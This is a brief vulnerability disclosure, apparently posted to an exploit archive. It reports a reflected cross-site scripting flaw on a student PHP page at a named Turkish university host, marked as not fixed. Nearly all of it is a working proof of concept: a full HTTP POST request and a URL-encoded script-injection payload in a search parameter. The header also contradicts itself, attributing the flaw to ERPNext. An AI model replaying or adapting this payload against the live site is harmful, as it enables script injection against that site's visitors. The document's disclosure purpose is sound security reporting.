lidya hacettepe Cross Site Scripting

Name: lidya.hacettepe.edu.tr Cross-site Scripting Vulnerabilities in ERPNext
Vendor Homepage: lidya.hacettepe.edu.tr
Vulnerability Type: Reflected Cross-site Scripting
Severity: High
Status: NOTFixed
----------------------------------------------------------------------------------------------------------------------------------------------
Request Headers

POST /~ahmett10/bto316/ilac/ilaclar.php HTTP/1.1
Content-Length: 94
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=52hvvq2g6l8qu0slfojti0aub1
Host: lidya.hacettepe.edu.tr
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
---------------------------------------------------------------------------------------------------------------------------------------------
alert here =>
ara=Ara&bul=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28956925%29%3c%2fScRiPt%3e&sec=t_ilac.adi
----------------------------------------------------------------------------------------------------------------------------------------------